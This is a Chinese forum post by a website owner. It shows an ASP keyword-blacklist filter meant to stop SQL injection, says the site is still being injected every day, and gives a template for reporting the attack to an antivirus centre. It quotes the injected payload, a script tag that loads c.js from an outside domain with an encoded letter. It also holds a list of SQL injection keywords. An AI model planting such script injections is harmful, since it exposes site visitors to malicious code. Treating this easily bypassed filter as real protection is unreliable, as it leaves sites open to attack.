已经在conn.asp中加入了get和post防注入：
dim sql_injdata,Sql_Inj,SQL_Get,Sql_DATA
SQL_injdata = "'|and|exec|insert|select|delete|update|count|*|%|master|truncate|declare|sysobjects"
SQL_inj = split(SQL_Injdata,"|")
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Lcase(Request.QueryString(SQL_Get)),Sql_Inj(Sql_DATA))>0 Then
Response.Write "<Script Language=JavaScript>alert('非法注入!');history.back(-1)</Script>"
Response.end
end if
next
Next
End If
还是被注入了，请高手指点！！！

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

被注入的内容:
<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script>

这个人每天注一次，这几天更频繁，我恢复了又被注了，恢复了又被注，我实在受不了了！！！！！！！！！！！！！

我的QQ：564341701－

报警网站:
http://www.antivirus-china.org.cn

报警邮箱:
contact@antivirus-china.org.cn

报警主题及内容:
 
  主题: 上千网站被黑急待处理-被注入c.js(自己的网站名)!

尊敬的国家计算机病毒应急处理中心工作人员:

    我是(自己的网站名)的站长,近一个星期每天SQL注入,被注入代码:" <Script Src=http://c.nuc%6Cear3.com/css/c.js> </Script>"
而且每天现在有成千上万的网站还在进一步深受其害,望查明原因, 帮助解决!


站名:
联系人:
联系电话:
QQ及邮箱:

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)